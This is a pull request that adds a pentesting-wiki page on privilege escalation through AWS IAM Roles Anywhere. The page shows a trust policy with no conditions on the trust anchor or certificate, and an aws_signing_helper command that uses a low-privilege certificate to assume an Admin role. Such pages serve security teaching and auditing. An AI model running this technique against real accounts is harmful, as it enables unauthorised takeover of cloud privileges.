### PR TITLE
Adding page for IAM Roles Anywhere Privesc 

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-roles-anywhere-privesc.md
@@ -1,0 +1,50 @@
+# AWS - IAM Roles Anywhere Privesc
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+AWS IAM RolesAnywhere allows workloads outside AWS to assume IAM roles using X.509 certificates. But when trust policies aren't properly scoped, they can be abused for privilege escalation.
+
+This policy lacks restrictions on which trust anchor or certificate attributes are allowed. As a result, any certificate tied to any trust anchor in the account can be used to assume this role.
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Effect": "Allow",
+      "Principal": {
+        "Service": "rolesanywhere.amazonaws.com"
+      },
+      "Action": [
+        "sts:AssumeRole",
+        "sts:SetSourceIdentity",
+        "sts:TagSession"
+      ]
+    }
+  ]
+}
+
+```
+
+To privesc, the `aws_signing_helper` is required from https://docs.aws.amazon.com/rolesanywhere/latest/userguide/credential-helper.html
+
+Then using a valid certificate the attacker can pivot into the higher privilege role 
+
+```bash
+aws_signing_helper credential-process \
+  --certificate readonly.pem \
+  --private-key readonly.key \
+  --trust-anchor-arn arn:aws:rolesanywhere:us-east-1:123456789012:trust-anchor/ta-id \
+  --profile-arn arn:aws:rolesanywhere:us-east-1:123456789012:profile/default \
+  --role-arn arn:aws:iam::123456789012:role/Admin
+```
+
+
+### References
+
+- https://www.ruse.tech/blogs/aws-roles-anywhere-privilege-escalation/
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+
+


### PR DESCRIPTION
This PR adds a new blog post under the AWS privilege escalation section. It highlights how overly permissive trust policies that don’t restrict by trust anchor or certificate attributes in IAM Roles Anywhere can be abused by with any valid certificate to escalate privileges.



